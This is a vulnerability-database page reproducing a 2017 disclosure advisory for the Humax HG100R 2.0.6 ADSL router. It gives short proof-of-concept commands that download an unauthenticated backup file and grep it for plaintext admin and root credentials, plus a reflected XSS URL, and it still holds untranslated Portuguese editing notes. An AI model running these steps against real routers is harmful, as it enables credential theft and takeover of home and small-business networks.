Vulners
Lucene search
Humax Digital HG100R 2.0.6 XSS / Information Disclosure
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | Humax HG100R 2.0.6 - Backup File Download Exploit | 30 Jun 201700:00 | – | zdt |
 | Humax Digital HG100R Backup File Download Vulnerability | 4 Jul 201700:00 | – | cnvd |
| Humax Digital HG100R Cross-Site Scripting Vulnerability | 4 Jul 201700:00 | – | cnvd |
| Humax Digital HG100R Root Credentials Disclosure Vulnerability | 4 Jul 201700:00 | – | cnvd |
 | CVE-2017-7315 | 4 Jul 201702:00 | – | cve |
| CVE-2017-7316 | 4 Jul 201702:00 | – | cve |
| CVE-2017-7317 | 4 Jul 201702:00 | – | cve |
 | CVE-2017-7315 | 4 Jul 201702:00 | – | cvelist |
| CVE-2017-7316 | 4 Jul 201702:00 | – | cvelist |
| CVE-2017-7317 | 4 Jul 201702:00 | – | cvelist |
10
`Humax Digital HG100R multiple vulnerabilities
Device: Humax HG100R
Software Version: VER 2.0.6
- Backup file download (CVE-2017-7315)
An issue was discovered on Humax Digital HG100R 2.0.6 devices, a modem commonly used by ISPs to provide ADSL internet service to household and small business users. (CHECA ESSA INFO)
To download the backup file it's not required the use of credentials or any authentication, and the router credentials are stored in plaintext inside the backup.
PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 admin
--------------------------------------------------------------------------------
- XSS Reflected(CVE-2017-7316)
An issue was discovered on Humax Digital HG100R 2.0.6 devices. DESCREVE BREVEMENTE O QUE A XSS REFLECTED E FALA O QUE PODE FAZER COM O USUARIO USANDO ISSO.
There is XSS reflected on the 404 page.
PoC
http://192.168.0.1<script>alert('XSS')</script>
--------------------------------------------------------------------------------
- Default credentials to router's web application not declared in the manual(CVE-2017-7317) NAO ENTENDI ESSA FRASE. QUE QUIS DIZER?
An issue was discovered on Humax Digital HG100 2.0.6 devices.
The attacker can find the root credentials in the backup file.
PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 root
Timeline
2017-03-15 - First contact. Ignored by the vendor.
2017-03-21 - Second contact.
2017-03-22 - The vendor answered asking about the vulnerability.
2017-03-27 - Asked the vendor about his security team contact informarion to report the vulnerability.
2017-03-28 - The vendor answered saying that it is an old product, and they will check this vulnerabilities in the news products.
2017-03-28 - Ask the vendor about a patch.
2017-03-30 - Ask the vendor again about the patch.
2017-04-03 - Notified the vendor about the disclousure after 90 days, even without a patch.
2017-04-19 - Ask the vendor about a patch.
2017-05-08 - Ask the vendor about a patch.
2017-06-29 - Disclosure.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jul 2017 00:00Current
7.9High risk
Vulners AI Score7.9
EPSS0.00887